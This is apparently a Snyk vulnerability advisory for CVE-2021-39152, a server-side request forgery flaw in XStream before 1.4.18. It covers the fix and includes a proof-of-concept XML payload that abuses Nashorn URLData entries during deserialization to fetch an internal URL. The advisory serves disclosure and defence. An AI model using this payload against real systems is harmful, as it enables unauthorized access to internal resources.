Server-Side Request Forgery (SSRF) Affecting com.thoughtworks.xstream:xstream package, versions [,1.4.18)
Snyk CVSS
Threat Intelligence
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569190
- published 24 Aug 2021
- disclosed 24 Aug 2021
- credit m0d9
Introduced: 24 Aug 2021
CVE-2021-39152 Open this link in a new tabHow to fix?
Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.
Overview
com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.
Affected versions of this package are vulnerable to Server-Side Request Forgery (SSRF). This vulnerability may allow a remote attacker to request data from internal resources that are not publicly available only by manipulating the processed input stream with a Java runtime version 14 to 8. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types.
PoC
<map>
<entry>
<jdk.nashorn.internal.runtime.Source_-URLData>
<url>http://localhost:8080/internal/</url>
<cs>GBK</cs>
<hash>1111</hash>
<array>b</array>
<length>0</length>
<lastModified>0</lastModified>
</jdk.nashorn.internal.runtime.Source_-URLData>
<jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/>
</entry>
<entry>
<jdk.nashorn.internal.runtime.Source_-URLData>
<url>http://localhost:8080/internal/</url>
<cs reference='../../../entry/jdk.nashorn.internal.runtime.Source_-URLData/cs'/>
<hash>1111</hash>
<array>b</array>
<length>0</length>
<lastModified>0</lastModified>
</jdk.nashorn.internal.runtime.Source_-URLData>
<jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/>
</entry>
</map>
XStream xstream = new XStream();
xstream.fromXML(xml);